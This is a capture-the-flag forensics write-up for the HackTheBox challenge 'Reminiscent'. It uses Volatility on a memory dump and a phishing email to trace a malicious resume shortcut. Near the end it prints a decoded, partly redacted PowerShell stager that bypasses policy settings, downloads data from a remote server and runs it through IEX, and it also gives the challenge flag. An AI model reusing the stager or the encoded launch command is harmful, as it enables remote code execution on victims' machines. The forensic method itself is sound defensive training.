Reminiscent
Suspicious traffic was detected from a recruiter's virtual PC. A memory dump of the offending VM was captured before it was removed from the network for imaging and analysis. Our recruiter mentioned he received an email from someone regarding their resume. A copy of the email was recovered and is provided for reference. Find and decode the source of the malware to find the flag.
Download files!
Install Volatility
Install Thunderbird
Get some information on the files
┌──(kali㉿kali)-[~/…/hackthebox/Forensics/reminiscent/reminiscent]
└─$ cat imageinfo.txt
Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_23418
AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
AS Layer2 : VirtualBoxCoreDumpElf64 (Unnamed AS)
AS Layer3 : FileAddressSpace (/home/infosec/dumps/mem_dumps/01/flounder-pc-memdump.elf)
PAE type : No PAE
DTB : 0x187000L
KDBG : 0xf800027fe0a0L
Number of Processors : 2
Image Type (Service Pack) : 1
KPCR for CPU 0 : 0xfffff800027ffd00L
KPCR for CPU 1 : 0xfffff880009eb000L
KUSER_SHARED_DATA : 0xfffff78000000000L
Image date and time : 2017-10-04 18:07:30 UTC+0000
Image local date and time : 2017-10-04 11:07:30 -0700
┌──(kali㉿kali)-[~/…/hackthebox/Forensics/reminiscent/reminiscent]
└─$ file flounder-pc-memdump.elf
flounder-pc-memdump.elf: ELF 64-bit LSB core file, x86-64, version 1 (SYSV)
┌──(kali㉿kali)-[~/…/hackthebox/Forensics/reminiscent/reminiscent]
└─$ file Resume.eml
Resume.eml: SMTP mail, ASCII text, with CRLF line terminators
┌──(kali㉿kali)-[~/…/hackthebox/Forensics/reminiscent/reminiscent]
└─$ strings Resume.eml
Return-Path: <bloodworm@madlab.lcl>
Delivered-To: madlab.lcl-flounder@madlab.lcl
Received: (qmail 2609 invoked by uid 105); 3 Oct 2017 02:30:24 -0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="=_a8ebc8b42c157d88c1096632aeae0559"
Date: Mon, 02 Oct 2017 22:30:24 -0400
From: Brian Loodworm <bloodworm@madlab.lcl>
To: flounder@madlab.lcl
Subject: Resume
Organization: HackTheBox
Message-ID: <add77ed2ac38c3ab639246956c25b2c2@madlab.lcl>
X-Sender: bloodworm@madlab.lcl
Received: from mail.madlab.lcl (HELO mail.madlab.lcl) (127.0.0.1)
by mail.madlab.lcl (qpsmtpd/0.96) with ESMTPSA (ECDHE-RSA-AES256-GCM-SHA384 encrypted); Mon, 02 Oct 2017 22:30:24 -0400
--=_a8ebc8b42c157d88c1096632aeae0559
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII
Hi Frank, someone told me you would be great to review my resume..
Could you have a look?
resume.zip [1]
Links:
------
[1] http://10.10.99.55:8080/resume.zip
--=_a8ebc8b42c157d88c1096632aeae0559
Content-Transfer-Encoding: quoted-printable
Content-Type: text/html; charset=UTF-8
<html><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3DUTF-8" /></head><body style=3D'font-size: 10pt; font-family: Verdana,Gen=
eva,sans-serif'>
<div class=3D"pre" style=3D"margin: 0; padding: 0; font-family: monospace">=
<br /> Hi Frank, someone told me you would be great to review my resume.. c=
uold you have a look?<br /> <br /><a href=3D"http://10.10.99.55:8080/resume=
=2Ezip">resume.zip</a></div>
</body></html>
--=_a8ebc8b42c157d88c1096632aeae0559--Let's use Volatility!
┌──(kali㉿kali)-[~/…/hackthebox/Forensics/reminiscent/reminiscent]
└─$ python3 ~/Tools/volatility3-1.0.0/vol.py -f flounder-pc-memdump.elf windows.pstree.PsTree 2 ⨯
Volatility 3 Framework 1.0.0
Progress: 100.00 PDB scanning finished
PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime
4 0 System 0xfa8000839060 83 477 N/A False 2017-10-04 18:04:27.000000 N/A
* 272 4 smss.exe 0xfa8000839060 2 30 N/A False 2017-10-04 18:04:27.000000 N/A
348 328 csrss.exe 0xfa8000839060 9 416 0 False 2017-10-04 18:04:29.000000 N/A
376 328 wininit.exe 0xfa8000839060 3 77 0 False 2017-10-04 18:04:29.000000 N/A
* 500 376 lsm.exe 0xfa8000839060 11 150 0 False 2017-10-04 18:04:30.000000 N/A
* 476 376 services.exe 0xfa8000839060 11 201 0 False 2017-10-04 18:04:29.000000 N/A
** 384 476 svchost.exe 0xfa8000839060 17 386 0 False 2017-10-04 18:04:30.000000 N/A
*** 432 384 winlogon.exe 0xfa8000839060 4 112 1 False 2017-10-04 18:04:29.000000 N/A
*** 396 384 csrss.exe 0xfa8000839060 9 283 1 False 2017-10-04 18:04:29.000000 N/A
**** 2772 396 conhost.exe 0xfa8000839060 2 55 1 False 2017-10-04 18:06:58.000000 N/A
** 868 476 svchost.exe 0xfa8000839060 21 429 0 False 2017-10-04 18:04:30.000000 N/A
*** 2020 868 dwm.exe 0xfa8000839060 4 72 1 False 2017-10-04 18:04:41.000000 N/A
** 900 476 svchost.exe 0xfa8000839060 41 977 0 False 2017-10-04 18:04:30.000000 N/A
** 1092 476 svchost.exe 0xfa8000839060 19 321 0 False 2017-10-04 18:04:31.000000 N/A
** 1704 476 SearchIndexer. 0xfa8000839060 16 734 0 False 2017-10-04 18:04:47.000000 N/A
*** 1960 1704 SearchProtocol 0xfa8000839060 6 311 0 False 2017-10-04 18:04:48.000000 N/A
*** 812 1704 SearchFilterHo 0xfa8000839060 4 92 0 False 2017-10-04 18:04:48.000000 N/A
** 2120 476 svchost.exe 0xfa8000839060 12 335 0 False 2017-10-04 18:06:32.000000 N/A
** 2248 476 wmpnetwk.exe 0xfa8000839060 18 489 0 False 2017-10-04 18:06:33.000000 N/A
** 600 476 svchost.exe 0xfa8000839060 12 360 0 False 2017-10-04 18:04:30.000000 N/A
*** 592 600 WmiPrvSE.exe 0xfa8000839060 9 127 0 False 2017-10-04 18:06:35.000000 N/A
*** 2924 600 WmiPrvSE.exe 0xfa8000839060 10 204 0 False 2017-10-04 18:06:26.000000 N/A
** 1196 476 svchost.exe 0xfa8000839060 28 333 0 False 2017-10-04 18:04:31.000000 N/A
** 664 476 VBoxService.ex 0xfa8000839060 12 118 0 False 2017-10-04 18:04:30.000000 N/A
** 1052 476 spoolsv.exe 0xfa8000839060 13 277 0 False 2017-10-04 18:04:31.000000 N/A
** 728 476 svchost.exe 0xfa8000839060 7 270 0 False 2017-10-04 18:04:30.000000 N/A
** 1720 476 taskhost.exe 0xfa8000839060 8 148 1 False 2017-10-04 18:04:36.000000 N/A
** 1840 476 sppsvc.exe 0xfa8000839060 4 145 0 False 2017-10-04 18:04:37.000000 N/A
** 792 476 svchost.exe 0xfa8000839060 21 443 0 False 2017-10-04 18:04:30.000000 N/A
** 988 476 svchost.exe 0xfa8000839060 13 286 0 False 2017-10-04 18:04:30.000000 N/A
* 492 376 lsass.exe 0xfa8000839060 8 590 0 False 2017-10-04 18:04:30.000000 N/A
2044 2012 explorer.exe 0xfa8000839060 36 926 1 False 2017-10-04 18:04:41.000000 N/A
* 496 2044 powershell.exe 0xfa8000839060 12 300 1 False 2017-10-04 18:06:58.000000 N/A
** 2752 496 powershell.exe 0xfa8000839060 20 396 1 False 2017-10-04 18:07:00.000000 N/A
* 1476 2044 VBoxTray.exe 0xfa8000839060 13 146 1 False 2017-10-04 18:04:42.000000 N/A
* 2812 2044 thunderbird.ex 0xfa8000839060 50 534 1 True 2017-10-04 18:06:24.000000 N/AWhat about finding the resume file doing a file scan?
┌──(kali㉿kali)-[~/…/hackthebox/Forensics/reminiscent/reminiscent]
└─$ python3 ~/Tools/volatility3-1.0.0/vol.py -f flounder-pc-memdump.elf windows.filescan.FileScan | grep -i resume 1 ⨯
0x1e1f6200 100.0\Users\user\Desktop\resume.pdf.lnk 216
0x1e8feb70 \Users\user\Desktop\resume.pdf.lnk 216Let's try get the file... Not completely clean this next command...
┌──(kali㉿kali)-[~/…/hackthebox/Forensics/reminiscent/reminiscent]
└─$ python3 ~/Tools/volatility3-1.0.0/vol.py -f flounder-pc-memdump.elf windows.dumpfiles.DumpFiles --pid 496 2 ⨯
Volatility 3 Framework 1.0.0
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xfa8001cfeb70 resume.pdf.lnk file.0xfa8001cfeb70.0xfa80022ac740.DataSectionObject.resume.pdf.lnk.dat
SharedCacheMap 0xfa8001cfeb70 resume.pdf.lnk file.0xfa8001cfeb70.0xfa80017dcc60.SharedCacheMap.resume.pdf.lnk.vacb
ImageSectionObject 0xfa80017f7be0 System.Transactions.dll file.0xfa80017f7be0.0xfa8000887c50.ImageSectionObject.System.Transactions.dll.img
ImageSectionObject 0xfa8000e2d400 System.Transactions.dll file.0xfa8000e2d400.0xfa8000887c50.ImageSectionObject.System.Transactions.dll.img
ImageSectionObject 0xfa8001664f20 ntdll.dll file.0xfa8001664f20.0xfa800167a9a0.ImageSectionObject.ntdll.dll.img
<keyboard interrupt>Cut out the rest - Those two first files are the ones!
String it out!
┌──(kali㉿kali)-[~/…/hackthebox/Forensics/reminiscent/reminiscent]
└─$ strings file.0xfa8001cfeb70.0xfa80017dcc60.SharedCacheMap.resume.pdf.lnk.vacb 130 ⨯
/C:\
DKfp
Windows
DKfp*
System32
WINDOW~1
v1.0
KV}*
powershell.exe
K6}*
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
%SystemRoot%\system32\SHELL32.dll
1SPS
cABvAHcAZQByAHMAaABlAG<redacted>QA=
,&fbM
,&fbMBase64?
┌──(kali㉿kali)-[~/…/hackthebox/Forensics/reminiscent/reminiscent]
└─$RwA4AEEAWgB3AEIAbgBBA<redacted>BnAEEAcgBBAEMAUQBBAFMAdwBBAHAAQQBDAGsAQQBmAEEAQgBKAEEARQBVAEEAVwBBAEEAPQA=' | base64 -d
powershell -noP -sta -w 1 -enc JABHA<redacted>UAWAA=More base64?
┌──(kali㉿kali)-[~/…/hackthebox/Forensics/reminiscent/reminiscent]
└─$ echo 'JABHA<redacted>AEUAWAA=' | base64 -d
$GroUPPOLiCYSEttINGs = [rEF].ASseMBLY.GEtTypE('System.Management.Automation.Utils')."GEtFIE`ld"('cachedGroupPolicySettings'<redacted>$flag='HTB{$_j0G_y0uR_M3m0rY_$}';$DatA=$WC.DoWNLoaDDATA($SeR+$t);$iv=$daTA[0..3];$DAta=$DaTa[4..$DAta.LenGTH];-JOIN[CHAr[]](& $R $datA ($IV+$K))|IEX Flag!
Last updated